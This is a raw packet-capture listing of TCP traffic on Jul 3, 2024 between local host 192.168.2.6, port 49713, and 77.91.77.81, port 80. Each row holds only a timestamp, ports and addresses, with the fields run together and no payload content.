                                                                Jul 3, 2024 08:38:25.265141010 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.265141010 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.265206099 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.265362024 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.265374899 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.265384912 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.265396118 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.265430927 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.265430927 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.265579939 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.265592098 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.265644073 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.265644073 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.303563118 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.303579092 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.303590059 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.303616047 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.303658009 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.303668976 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.303702116 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.303724051 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.303766012 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.303776979 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.303787947 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.303831100 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.303831100 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.303913116 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.303924084 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.303935051 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.303949118 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.303975105 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.304014921 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.304025888 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.304074049 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.304074049 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.304095030 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.304107904 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.304147959 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.304194927 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.304195881 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.304205894 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.304219007 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.304251909 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.304251909 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.304359913 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.304371119 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.304382086 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.304398060 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.304409027 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.304418087 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.304418087 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.304497004 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.304594040 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.304605007 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.304615974 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.304626942 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.304637909 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.304660082 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.304660082 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.304676056 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.304807901 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.304822922 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.304842949 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.304888010 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.305032969 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.305043936 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.305054903 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.305066109 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.305075884 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.305087090 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.305097103 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.305097103 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.305098057 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.305131912 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.305131912 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.305315971 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.305326939 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.305337906 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.305347919 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.305358887 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.305375099 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.305386066 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.305386066 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.305394888 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.305408001 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.305429935 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.305429935 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.305480957 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.305628061 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.305689096 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.305715084 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.305726051 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.305736065 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.305747986 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.305763960 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.305774927 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.305773973 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.305773973 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.305800915 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.305957079 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.305968046 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.305977106 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.305989027 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.306010008 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.306010008 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.306070089 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.306077003 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.306148052 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.306159019 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.306169987 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.306180954 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.306180954 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.306236029 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.306410074 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.306421995 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.306432009 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.306442022 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.306452990 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.306464911 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.306471109 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.306471109 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.306477070 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.306493998 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.306504011 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.306514025 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.306514025 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.306515932 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.306551933 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.306699991 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.306725025 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.306736946 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.306763887 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.306808949 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.306811094 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.306822062 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.306833982 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.306844950 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.306855917 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.306864023 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.306864023 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.306868076 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.306885958 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.306893110 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.306896925 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.306931019 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.306931019 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.307348967 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.307359934 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.307369947 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.307380915 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.307393074 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.307404041 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.307408094 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.307408094 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.307416916 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.307426929 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.307437897 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.307455063 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.307455063 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.307476997 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.336072922 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.336086035 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.336097002 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.336108923 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.336146116 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.336157084 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.336179018 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.336230993 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.336244106 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.336245060 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.336302042 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.336302042 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.336594105 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.336644888 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.336654902 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.336679935 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.336679935 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.336708069 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.336719990 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.336730003 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.336745024 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.336745024 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.336807966 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.336841106 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.336853027 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.336863041 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.336905956 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.336905956 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.355583906 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.355612040 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.355623960 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.355720043 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.355725050 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.355753899 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.355801105 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.355921984 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.355933905 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.355943918 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.355957031 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.355973959 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.355973959 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.355992079 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.356003046 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.356014013 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.356015921 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.356015921 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.356168032 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.356179953 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.356206894 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.356206894 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.356237888 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.394285917 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.394320011 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.394330978 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.394350052 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.394361019 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.394371033 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.394418001 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.394454002 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.394460917 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.394505024 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.394517899 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.394530058 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.394583941 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.394583941 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.394669056 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.394690037 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.394701004 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.394711018 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.394722939 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.394737005 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.394737005 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.394795895 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.394876003 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.394887924 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.394917965 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.394927979 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.394942999 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.394942999 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.395010948 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.395083904 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.395095110 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.395104885 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.395117044 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.395128012 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.395144939 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.395144939 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.395169020 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.395328045 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.395339012 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.395349026 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.395359039 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.395368099 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.395379066 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.395390034 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.395400047 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.395410061 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.395420074 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.395427942 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.395427942 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.395467043 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.395629883 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.395639896 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.395657063 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.395667076 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.395688057 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.395695925 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.395695925 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.395699024 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.395729065 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.395879030 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.395891905 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.396013021 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.396017075 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.396028996 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.396039009 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.396049976 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.396064043 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.396074057 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.396083117 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.396094084 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.396105051 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.396115065 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.396143913 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.396178007 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.396337986 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.396349907 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.396409035 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.396409035 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.396473885 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.396493912 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.396505117 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.396514893 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.396524906 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.396539927 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.396539927 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.396619081 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.396743059 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.396753073 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.396764040 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.396774054 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.396787882 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.396801949 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.396802902 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.396812916 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.396817923 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.396825075 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.396835089 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.396852970 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.396862984 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.396893978 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.397056103 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.397067070 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.397077084 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.397088051 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.397098064 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.397108078 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.397118092 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.397123098 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.397123098 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.397136927 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.397147894 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.397157907 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.397167921 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.397167921 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.397169113 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.397180080 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.397197962 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.397202969 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.397260904 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.397716999 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.397728920 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.397738934 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.397748947 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.397759914 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.397769928 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.397779942 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.397789955 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.397789955 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.397789955 CEST4971380192.168.2.677.91.77.81
